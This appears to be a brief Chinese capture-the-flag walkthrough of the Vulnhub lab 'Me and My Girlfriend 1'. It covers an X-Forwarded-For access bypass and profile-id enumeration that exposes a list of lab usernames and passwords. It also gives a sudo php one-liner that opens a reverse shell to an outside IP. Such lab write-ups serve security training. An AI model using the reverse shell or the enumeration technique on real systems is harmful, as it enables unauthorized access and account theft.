zoukankan      html  css  js  c++  java
  • Girlfreind:1 Vulnhub Walkthrough

    靶机链接:

    https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

    主机扫描:

    HTTP 目录访问,提示无权限,右键源码,提示XXF即可

    正常访问,注册一个用户,登录,然后查看用户profile,通过id进行遍历枚举用户密码

    eweuhtandingan skuyatuh
    sedihaingmah cedihhihihi
    aingmaung qwerty!!!
    abdikasepak dorrrrr
    sundatea indONEsia
    alice 4lic3
    pentest pentest

    通过注意登录web,无发现上传的点

    然后通过ssh尝试登录

    提权操作

    sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

    OVER !!

  • 相关阅读:
    第七章11
    第七章10
    第七章9
    第七章8
    第七章7
    第七章6
    第七章5
    第七章例7-13
    第七章例7-12
    第七章例7-11
  • 原文地址:https://www.cnblogs.com/hack404/p/12143701.html
Copyright © 2011-2022 走看看